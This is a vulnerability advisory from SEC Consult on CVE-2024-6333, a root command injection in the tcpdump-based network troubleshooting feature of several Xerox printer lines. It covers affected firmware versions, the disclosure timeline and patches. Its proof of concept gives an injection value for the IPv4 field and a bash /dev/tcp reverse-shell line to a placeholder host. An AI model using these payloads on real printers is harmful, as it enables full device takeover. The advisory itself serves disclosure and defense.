Authenticated Remote Code Execution in multiple Xerox printers

Title

Authenticated Remote Code Execution

Product

Multiple Xerox printers (EC80xx, AltaLink, VersaLink, WorkCentre)

Vulnerable Version

see vulnerable versions below

Fixed Version

see solution section below

CVE Number

CVE-2024-6333

Impact

high

Homepage

https://xerox.com

Found

14.12.2023

By

Timo Longin (Office Vienna), Tamas Jos (Office Zurich) | SEC Consult Vulnerability Lab

Multiple Xerox printers (EC80xx, AltaLink, VersaLink, WorkCentre) were affected by an authenticated remote code execution vulnerability which allowed an attacker with administrative web credentials to fully compromise the devices with root privileges on the operating system.

Vendor description

"We are a global leader in office and production print technology and related solutions, with a large and growing presence in Digital and IT Services. Having redefined the workplace experience for more than 100 years, our differentiated business and technology offerings are empowering client success today by addressing the productivity challenges of a hybrid workplace and distributed workforce."

Source: investors.xerox.com


Business recommendation

SEC Consult recommends Xerox customers to install the latest updates and review the vendor's security note XRX24-015 for further information.

Also make sure to have patches from previous security notes installed, such as XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE, partial authentication bypass) that were already patched but not clearly communicated in the previous security notes.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.


Vulnerability overview/description

1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)

An attacker authenticated as a user with administrative access to the web interface of a range of affected Xerox printers can exploit a remote code execution vulnerability (RCE) as root user. It allows an attacker to execute commands directly on the operating system of the printer with root permissions. Consequently, the target Xerox printer can be fully compromised.


Proof of concept

1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)

 The "Network Troubleshooting" menu enables administrators to configure and run network troubleshooting based on the tcpdump tool. The web interface allows to apply custom filters like an IPv4 address as well as specific network services, as seen in the image (figure 1) below.
 

Figure 1: Exploiting the network troubleshooting feature

Due to insufficient input validation in the IPv4 address value, an attacker may inject further OS commands into the final tcpdump command string. For example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)", commands stored under "/tmp/~cmd" get executed, when starting a network troubleshooting session.

Note: The payload in the IPv4 address must bypass a character filter, and was kept simple for demonstration purposes. Other payloads that directly execute commands without requiring the "/tmp/~cmd" file exist and can be crafted.

An attacker who, for example, has previously exploited the unauthenticated RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant the following commands for a reverse shell in to "/tmp/~cmd".

bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1

Since, the network troubleshooting service is running tcpdump with root permissions, full access to a range of Xerox printers can be obtained this way. See figure 2 below.

Figure 2: Reverse shell

Vulnerable versions

The following products & versions have been tested initially, which were not patched to the latest version according to vendor. Hence our other identified critical security issues were removed from this advisory.

  • Xerox Workcentre 7970 (073.200.167.09610)
  • Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

  • AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)
  • AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)
  • Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)
  • Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)
  • Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)
  • AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
  • AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
  • AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
  • AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
  • VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
  • VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
  • WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)
  • WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)
  • WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)
  • WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)
  • WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)
  • WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)
  • WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)
  • WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)
  • WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)
  • WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)


Vendor contact timeline

2024-02-05 Contacting vendor through the Xerox Security Response Center (XSRC) https://forms.business.xerox.com/en-us/xerox-security-response-center/
2024-02-06 Xerox assigns case id XSRC-2024-0003
2024-02-08 Xerox provides links for the current firmware versions to confirm whether the issues can be reproduced.
2024-02-27 Xerox asks for status update.
2024-02-28 The authenticated RCE was confirmed to be exploitable in the current firmware version (075.040.013.29000 and 075.200.013.29000). Vulnerability one and two are fixed in the most recent versions.
2024-03-19 Xerox requests more information on provided PoCs.
2024-04-02 SEC Consult provides the requested information.
2024-04-18 SEC Consult asks for updates on the vulnerability status.
2024-05-06 Xerox provides an update/patch for the affected WorkCentre7890 and 7855 series.
2024-05-16 SEC Consult asks about a CVE number for the authenticated RCE vulnerability. Also SEC Consult inquires about for further plans on confirming the affected models and versions that are potentially affected by the partial authentication bypass and pre-authenticated RCE vulnerabilities.
2024-05-21 Xerox states that they are evaluating other models. Also, they request a CVSS score and vector for the authenticated RCE. Furthermore, more details on the public disclosure timeline are requested.
2024-05-23 SEC Consult provides the requested information.
2024-06-03 Status update from Xerox regarding CVE-ID request. Furthermore, more information on the to be released advisory is requested.
2024-06-06 Status update from Xerox regarding CVE-ID request.
2024-06-10 Xerox again requests a CVSS score and vector for the authenticated RCE.
2024-06-14 SEC Consult again provides the CVSS score and vector. Also, information on the to be released advisory is provided.
2024-06-25 Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.
2024-06-28 Informing Xerox about longer vacation period / absence. Asking again about further affected models.
2024-07-01 Xerox: Further models are affected, will be shared in the final publication.
2024-07-16 Xerox asks for our publication draft.
2024-07-31 Xerox asks again for our publication draft.
2024-07-31 SEC Consult reminds Xerox about vacation, references our draft advisory already sent a few months ago. Asking whether the other models are affected by the authenticated RCE only, or by the other identified vulnerabilities as well.
2024-08-28 Xerox provides high-level summary of the case, but no details on affected models.
2024-10-03 SEC Consult provides an updated advisory with minor changes to Xerox, again asking whether other versions and models are affected by the described vulnerabilities.
2024-10-07 Xerox provides further information on the partial authentication bypass and pre-authenticated RCE vulnerabilities, showing that these have been addressed in previous patches. Also, further coordination regarding Xerox' Security Bulletin Release.
2024-10-16 Release of Xerox Security Bulletin XRX24-015, covering the authenticated RCE vulnerability.
2024-10-18 Further coordination with Xerox on SEC Consult's advisory release.
2024-10-21 Sending latest advisory draft to Xerox, setting release date to 23rd October. Asking Xerox whether the security bulletin XRX23-020 (https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no mention regarding our pre-auth RCE there. Xerox responds with the link to the latest XRX24-015 bulletin and that our advisory is fine.
2024-10-23 Coordinated release of advisory.

Solution

Xerox provided patches for the affected printers. More information can be found in Xerox' Security Bulletin XRX24-015:

securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf


Workaround

None


Advisory URL

sec-consult.com/vulnerability-lab/

 

EOF Timo Longin, Tamas Jos / @2024

Interested to work with the experts of SEC Consult? Send us your application
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back